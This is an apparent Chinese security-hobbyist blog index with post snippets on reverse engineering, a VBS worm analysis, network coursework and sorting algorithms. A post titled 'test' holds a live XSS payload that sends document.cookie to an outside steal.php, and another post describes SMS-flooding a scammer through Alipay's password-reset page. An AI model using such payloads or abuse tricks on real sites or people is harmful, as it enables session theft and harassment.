- 博客(19)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 IDA 插件
plugin_t PLUGIN ={IDP_INTERFACE_VERSION, // IDA version plug-in is written for0, // Flags (see below)IDAP_init, // Initialisation functionIDAP_term, // Clean-up functionIDAP_run, // Main plug-in
2016-05-05 04:28:23
596
原创 非标准base64编码
testimport stringimport base64encode=""decode=""custom = "0ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789+/"standard= "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456
2016-05-04 10:06:55
3616
原创 test
<input id="hello" style="height:0px;width:0px" autofocus="" onfocusin="var image=new Image(); image.src='http://woaixiao.sinaapp.com/XSS/steal.php?cookie='+escape(document.cookie);document.getElemen
2015-09-22 16:10:11
454
原创 我是如何惩罚骗子的
这是去年的事了。偶然在朋友圈看到一条信息,说是分享点赞截图就送手机的。很可能是骗子。我就跟进了一下,果然是个骗子。骗邮费。如图拿这个邮箱去各种社工库都找不到任何相关的信息,也没查到注册信息。应该是一个专门骗钱的小号。最后想到在支付宝的登陆页面填写忘记密码,可以给手机发短信。于是就学了python,写了几句代码,达到了目的,由于接口限制,15分钟内只能发送
2015-07-09 17:02:18
3705
原创 uzgbtymhqo.vbs服务器端测试代码编写
虽然是一个很小的vbs病毒,但是功能也是足够齐全的,会下载上传文件,删除文件,枚举进程,查看系统相关的信息,更新木马,查看磁盘目录及目录下的文件。苦于没有服务器端,自己动手写了一个。思路:用C++动态更新php文件内容,而php文件则作为客户端请求的响应脚本。如需执行命令只需在C++中输入即可。运行界面:服务器端目录如下:主控php代码:(在is-rec
2015-07-09 11:36:55
1562
原创 实验室缉毒记之uzgbtymhqo.vbs
去年的事情了,写下来记一下吧。周三在机房插上U盘后,周四的数据库上机发现U盘里所有东西都变成lnk,如下图:随便打开一个lnk内容如下:C:\windows\system32\cmd.exe /c start uzgbtymhqo.vbs&start explorer PowerDesigner15&exit主要是这个uzgbtymhqo.vbs不知道是干什么的。
2015-07-09 11:13:21
2550
1
原创 http 基础认证(Basic Authentication)
还是几个月前的老东西。 计算机网络作业需要一个http基础认证的网站来学习http协议本身以及它的安全性。实在找不到这种网站,应该是过时了的技术吧。由于认证过程仅仅是Base64加密(其实这个不算加密吧,仅仅是把这些东西转换成MIME的格式方可在网络上面传输),而且每次都要带上这个认证信息的话,那是很不安全的。所以一般会是结合https一起,或者用其他认证方式,比如OA认证。好了,废话不说
2015-07-09 10:53:35
9150
原创 没有登录进windows时有什么进程在运行
前段时间讨论输入法漏洞导致无需密码直接进入系统的问题时,想到一个对策,就是在登陆进windows前,禁止陌生进程运行。据说当年微软拼音输入法漏洞时的修补方案就是限制自身的拼音输入法的某些功能。我们先看看没有登录进windows时有什么进程在运行。思路:如果有听过windows的粘滞键的话,应该会想到利用这个来实现。装一个5shift后门,然后再登陆界面把它呼唤出来,执行命令,把结果重定向到
2015-07-09 10:49:32
1060
原创 从一个扫描十二宿所有在线主机的脚本扯起
几个月前的事了,现在写写博客。刚刚好在学网络,也学了一点批处理,于是写了一个bat,用来扫描12宿所有以太网在线的主机。(不论是路由还是电脑,只要连了有线)。闲的蛋疼的同学可以拿来玩玩。代码太挫,各位自己优化吧。最后扫描结果存在同目录下的12.txt下面。运行结果如下: 根据记事本上面显示的行数,可以算出回复ICMP应答报文的主机数。(设为X)则2+2*255*5+X+
2015-07-09 09:29:44
802
原创 进程间通信 男女生洗澡问题
#define N 20#define NULL 0#define BOY 1#define GIRL 2typedef semaphore;semaphore mutex=1;semaphore empty=N;semaphore full=0; bool mutexFlag;int state;void want_to_bathe(sex){if(state==NULL)
2014-11-14 01:39:17
1705
原创 Java中int与String类型的互相转换
int i = 123;String str = ""+i;就这么简单。或者,Integer i = 123;String str = i.toString();或者,int i = 123;String str = String.valueOf(i);
2014-08-06 09:37:43
531
原创 XP那些事儿(此文参与2014-2015年南开大学大学语文征文活动)
某节课课间跟毛概老师探讨了XP的一些问题,下面就讨论一下XP吧。 首先,我们要知道XP是什么。XP是微软公司推出供个人电脑使用的操作系统。自微软于2001年10月25日推出该系统以来,该系统受到了用户的欢迎,在2007年1月,Windows XP的全球市场占有率达历史最高水平,超过76%,尽管这时候Microsoft已经推出了Windows vista.然而,就是这样一个元老级的操
2014-06-30 11:44:25
1849
原创 有限与无限初探
一直想写一点东西来专门剖析一下这一对对立统一的概念。只是本人对有限与无限的理解一直比较单纯,没有很好地去考虑这些问题,所以没写。这学期开始学实变函数,开始慢慢的认识这些东西。 以前总觉得,有限就是可以数的尽,是可以把握的,而无穷就是数不尽的也是难以预测的。很显然,这还没有上升到本质的高度。 在初等数学里,我们更多地在有限的领域里讨论,也更多的以有限作为手段进行讨论。在高等数学中,很多这
2014-06-30 11:13:11
1613
原创 ieframe.dll以及网络异常的经历
昨天中午打开电脑,一切都正常,看了看新闻就关机了,下午回来想下载一首歌,发现登不了网关!!昨晚捣弄了一个晚上,还是上不了网,也挺奇怪的,插上网线,能ping通百度,选课系统,还有cc.登陆网关客户端一打开就自动关闭,接入无线网络,能接入,但是还是无法打开网页,也无法登陆qq。郁闷。。用ie登陆网关,先是打开一个标题为ieframe.dll的页面,然后是说无法打开页面。。。用windows自带的诊断
2014-06-30 10:05:54
5777
原创 哈夫曼编码时遇到的一些问题
我被自己神奇地坑了 好久没写东西了。这些天都在编Huffman编码树,遇到一些问题,发现原来都是在坑自己。首先是以下代码无法正常读取文本文件 char c; ifstream fin("inputfile1.txt"); cout"File inputfile1.txt:"endl;
2014-06-30 09:58:29
6147
原创 不同排序的关系
不同排序的关系 排序算法之间的联系: 选择排序和插入排序都有选择和插入的过程,只是选择排序注重选择,插入位置是是末尾,插入排序讲究插入位置,而对于选择是没怎么讲究。快排和归并都是合久必分,然后,分久必合,分都是为了更好的合,快排注重分的方法,合的时候就是搁一起,归并讲究合的步骤,而对拆分没有快排那般讲究。堆排序是对选择排序的改进,选择排序里面众多的比较没有保存,而堆排序对部分比较的
2014-06-30 00:21:06
708
原创 异或与对称差
刚刚上计算机组成原理课的时候,或许会觉得汉明码的横空出世太神奇了,它是怎么知道二进制信息在传输过程中哪一位传错的呢?开始只是死记,后来发现太难记住了,于是想一探究竟,究竟是什么支配着这种编码纠错的可靠性。首先我们要知道的是,汉明码是只具有一位纠错能力的编码,那么二进制信息的传输校验可以在最多只有一位发生误传这个假设下讨论。这个问题的一个数学模型是:发送方将一串任意长度的01代码通过一定的处
2014-06-29 23:56:10
4495
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人